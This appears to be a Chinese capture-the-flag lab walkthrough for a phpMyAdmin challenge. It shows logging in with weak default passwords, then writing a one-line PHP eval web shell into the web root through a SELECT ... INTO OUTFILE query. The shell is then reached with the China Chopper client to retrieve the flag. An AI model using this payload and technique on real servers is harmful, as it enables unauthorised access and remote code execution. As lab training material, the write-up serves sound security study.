1. 进入后台,使用弱口令尝试登入
    如admin~admin,root-root等
    本题为root-root

墨者学院---phpMyAdmin后台文件包含分析溯源--解题思路

点到SQL,发现可以进行sql语句

墨者学院---phpMyAdmin后台文件包含分析溯源--解题思路

select ‘<?php eval($_POST[giao]);?>’ into outfile ‘/var/www/html/2.php’
3.执行成功
墨者学院---phpMyAdmin后台文件包含分析溯源--解题思路

4.上菜刀
墨者学院---phpMyAdmin后台文件包含分析溯源--解题思路

5.在根目录可以找到本题所需要的key

墨者学院---phpMyAdmin后台文件包含分析溯源--解题思路
在www/html目录中可以找到写入的一句话木马

相关文章:

  • 2021-09-08
  • 2022-01-12
  • 2021-09-22
  • 2021-09-08
  • 2021-05-19
  • 2021-09-09
  • 2021-12-02
  • 2021-11-23
猜你喜欢
  • 2021-07-28
  • 2021-09-11
  • 2021-11-03
  • 2021-12-10
  • 2021-11-01
  • 2021-08-20
  • 2021-12-28
相关资源
相似解决方案